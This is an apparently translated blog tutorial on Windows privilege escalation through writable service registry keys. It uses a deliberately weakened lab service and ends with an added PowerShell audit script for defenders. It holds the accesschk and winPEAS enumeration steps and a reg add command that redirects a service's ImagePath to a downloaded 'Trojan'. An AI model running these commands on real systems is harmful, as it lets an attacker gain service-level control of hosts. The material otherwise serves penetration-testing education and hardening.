Windows Privilege Escalation via Weak Service Registry Permissions


Overview

If a low-privileged user can write to the registry key of a service, they can hijack the key and change which executable the service runs, so that the service launches a malicious program under the service's account.

Hands-on demonstration

Environment setup

Create the following service:

[screenshot]

Assign PTO rights to the user:

[screenshot]

Modify the permissions on the following registry key:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\5attack

[screenshot]

Grant Full Control to Authenticated Users:

[screenshot]

accesschk64

The current permissions are as follows:

[screenshot]

Verify that Authenticated Users has been granted ALL access to the service key:

accesschk64.exe /accepteula "authenticated users" -kvuqsw hklm\System\CurrentControlSet\services

[screenshot]

Get the path of the target executable:

[screenshot]

PowerShell

[screenshot]

winPEASx64.exe

[screenshot]

Exploitation details

Download the Trojan onto the host, then point the service at it by editing its executable path directly in the registry:

reg add "HKLM\system\currentcontrolset\services\5attack" /t REG_EXPAND_SZ /v ImagePath /d "C:\Users\y\13339.exe" /f

[screenshot]

The permissions are as follows:

[screenshot]
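The accesschk check above looks for one group on one key. As an added defender-side audit (this script is not part of the original post), the following PowerShell enumerates every service key under HKLM\SYSTEM\CurrentControlSet\Services and reports any ACE that gives a low-privileged principal write rights on the key, which is exactly the condition that lets ImagePath be rewritten. It assumes it is run from an elevated PowerShell on the host being checked; the list of principals it flags is an assumption and goes beyond the single group used above.

```powershell
# Added example, not from the original post: audit service registry keys for
# write access granted to low-privileged principals (assumed list below).
# Run from an elevated PowerShell on the host being audited.

$lowPrivPrincipals = @(
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE',
    'BUILTIN\Users',
    'Everyone'
)

# Rights that let a caller change ImagePath or the key's own ACL.
# (Generic-right ACEs show up as large negative numbers and are not matched here.)
$writeRights = [int]([System.Security.AccessControl.RegistryRights]::SetValue -bor
                     [System.Security.AccessControl.RegistryRights]::CreateSubKey -bor
                     [System.Security.AccessControl.RegistryRights]::WriteKey -bor
                     [System.Security.AccessControl.RegistryRights]::ChangePermissions -bor
                     [System.Security.AccessControl.RegistryRights]::TakeOwnership -bor
                     [System.Security.AccessControl.RegistryRights]::FullControl)

$servicesRoot = 'HKLM:\SYSTEM\CurrentControlSet\Services'

Get-ChildItem -Path $servicesRoot -ErrorAction SilentlyContinue | ForEach-Object {
    $key = $_
    $acl = Get-Acl -Path $key.PSPath -ErrorAction SilentlyContinue
    if (-not $acl) { return }

    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        $principal = $ace.IdentityReference.Value
        if ($lowPrivPrincipals -notcontains $principal) { continue }
        if (([int]$ace.RegistryRights -band $writeRights) -eq 0) { continue }

        # Report the current ImagePath so a reviewer can see what the service runs today.
        $imagePath = (Get-ItemProperty -Path $key.PSPath -Name ImagePath `
                          -ErrorAction SilentlyContinue).ImagePath
        [PSCustomObject]@{
            Service   = $key.PSChildName
            Principal = $principal
            Rights    = $ace.RegistryRights
            Inherited = $ace.IsInherited
            ImagePath = $imagePath
        }
    }
} | Format-Table -AutoSize
```

Every row in the output is a service key whose ImagePath a standard user could rewrite; the fix is to remove that ACE so only Administrators and SYSTEM hold write rights, as on the default service keys.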


Author: Yangsir
Reprint policy: Unless otherwise stated, all articles on this blog are published under the CC BY 4.0 reprint policy. If you reproduce them, please credit the source: Yangsir!